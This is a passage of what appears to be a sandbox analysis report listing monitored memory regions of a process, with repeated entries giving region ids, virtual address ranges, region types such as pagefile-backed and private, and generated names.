pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20987 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20988 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20989 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20990 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20991 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20992 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20993 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20994 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20995 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20996 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20997 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20998 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20999 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21000 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21001 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21002 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21003 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21004 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21005 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21006 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21007 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21008 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21009 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21010 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21011 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21012 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21013 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21014 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21015 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21016 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21017 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21018 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21019 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21020 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21021 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21022 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21023 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21024 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21025 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21026 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21027 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21028 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21029 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21030 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21031 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21032 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21033 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21034 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21035 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21036 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21037 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21038 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21039 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21040 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21041 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21042 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21043 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21044 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21045 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21046 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21047 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21048 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21049 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21050 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21051 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21052 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21053 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21054 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21055 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21056 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21057 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21058 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21059 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21060 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21061 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21062 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21063 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21064 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21065 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21066 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21067 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21068 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21069 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21070 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21071 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21072 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21073 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21074 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21075 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21076 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21077 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21078 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21079 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21080 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21081 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21082 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21083 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21084 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21085 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21086 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21087 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21088 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21089 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21090 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21091 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21092 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21093 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21094 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21095 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21096 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21097 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21098 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21099 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21100 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21101 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21102 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21103 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21104 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21105 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21106 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21107 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21108 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21109 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21110 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21111 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21112 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21113 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21114 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21115 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21116 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21117 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21118 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21119 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21120 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21121 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21122 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21123 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21124 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21125 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21126 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21127 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21128 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21129 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21130 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21131 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21132 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21133 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21134 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21135 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21136 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21137 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21138 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21139 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21140 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21141 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21142 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21143 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21144 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21145 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21146 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21147 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21148 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21149 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21150 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21151 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21152 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21153 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21154 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21155 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21156 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21157 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21158 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21159 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21160 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21161 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21162 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21163 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21164 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21165 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21166 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21168 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21169 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21170 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21171 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21172 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21173 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21174 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21175 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21176 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21177 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21178 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21179 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = 